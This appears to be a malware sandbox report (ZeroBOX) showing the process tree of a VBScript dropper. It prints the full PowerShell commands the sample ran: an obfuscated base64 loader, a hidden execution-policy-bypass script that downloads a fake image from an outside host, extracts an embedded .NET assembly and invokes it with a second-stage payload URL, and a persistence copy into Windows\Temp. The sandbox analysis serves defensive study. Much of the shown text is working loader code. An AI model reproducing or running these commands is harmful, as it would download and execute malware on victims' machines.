| ZeroBOX

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\HTMLcachesIE.vbs
2996
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVQByUHOWdGtçceGwUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBoUHOWdGtçceHQUHOWdGtçcedUHOWdGtçceBwUHOWdGtçceHMUHOWdGtçceOgUHOWdGtçcevUHOWdGtçceC8UHOWdGtçcedQBwUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBuUHOWdGtçceHMUHOWdGtçceLgBjUHOWdGtçceG8UHOWdGtçcebQUHOWdGtçceuUHOWdGtçceGIUHOWdGtçcecgUHOWdGtçcevUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBzUHOWdGtçceC8UHOWdGtçceMUHOWdGtçceUHOWdGtçcewUHOWdGtçceDQUHOWdGtçceLwUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceNUHOWdGtçceUHOWdGtçcevUHOWdGtçceDcUHOWdGtçceNUHOWdGtçceUHOWdGtçce5UHOWdGtçceC8UHOWdGtçcebwByUHOWdGtçceGkUHOWdGtçceZwBpUHOWdGtçceG4UHOWdGtçceYQBsUHOWdGtçceC8UHOWdGtçcebgBlUHOWdGtçceHcUHOWdGtçceXwBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceLgBqUHOWdGtçceHUHOWdGtçceUHOWdGtçceZwUHOWdGtçce/UHOWdGtçceDEUHOWdGtçceNgUHOWdGtçce5UHOWdGtçceDgUHOWdGtçceMUHOWdGtçceUHOWdGtçce4UHOWdGtçceDQUHOWdGtçceNQUHOWdGtçceyUHOWdGtçceDMUHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcedwBlUHOWdGtçceGIUHOWdGtçceQwBsUHOWdGtçceGkUHOWdGtçceZQBuUHOWdGtçceHQUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceTgBlUHOWdGtçceHcUHOWdGtçceLQBPUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceTgBlUHOWdGtçceHQUHOWdGtçceLgBXUHOWdGtçceGUUHOWdGtçceYgBDUHOWdGtçceGwUHOWdGtçceaQBlUHOWdGtçceG4UHOWdGtçcedUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceHcUHOWdGtçceZQBiUHOWdGtçceEMUHOWdGtçcebUHOWdGtçceBpUHOWdGtçceGUUHOWdGtçcebgB0UHOWdGtçceC4UHOWdGtçceRUHOWdGtçceBvUHOWdGtçceHcUHOWdGtçcebgBsUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceEQUHOWdGtçceYQB0UHOWdGtçceGEUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBVUHOWdGtçceHIUHOWdGtçcebUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçceuUHOWdGtçceEUUHOWdGtçcebgBjUHOWdGtçceG8UHOWdGtçceZUHOWdGtçceBpUHOWdGtçceG4UHOWdGtçceZwBdUHOWdGtçceDoUHOWdGtçceOgBVUHOWdGtçceFQUHOWdGtçceRgUHOWdGtçce4UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceUwB0UHOWdGtçceHIUHOWdGtçceaQBuUHOWdGtçceGcUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBCUHOWdGtçceHkUHOWdGtçcedUHOWdGtçceBlUHOWdGtçceHMUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBTUHOWdGtçceFQUHOWdGtçceQQBSUHOWdGtçceFQUHOWdGtçcePgUHOWdGtçce+UHOWdGtçceCcUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGUUHOWdGtçcebgBkUHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBFUHOWdGtçceE4UHOWdGtçceRUHOWdGtçceUHOWdGtçce+UHOWdGtçceD4UHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBUUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceB0UHOWdGtçceC4UHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceE8UHOWdGtçceZgUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceZQBuUHOWdGtçceGQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceTwBmUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBGUHOWdGtçceGwUHOWdGtçceYQBnUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceHMUHOWdGtçcedUHOWdGtçceBhUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçceZQUHOWdGtçcegUHOWdGtçceDUHOWdGtçceUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceCsUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceLgBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceYgBhUHOWdGtçceHMUHOWdGtçceZQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceTUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZwB0UHOWdGtçceGgUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBzUHOWdGtçceHQUHOWdGtçceYQByUHOWdGtçceHQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBTUHOWdGtçceHUUHOWdGtçceYgBzUHOWdGtçceHQUHOWdGtçcecgBpUHOWdGtçceG4UHOWdGtçceZwUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGtçcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
  932
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LlJUSC9zd29kbml3LzQ1MS40Ni4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlc'))"
    2476
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\regasm.vbs -Force }
  2228

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents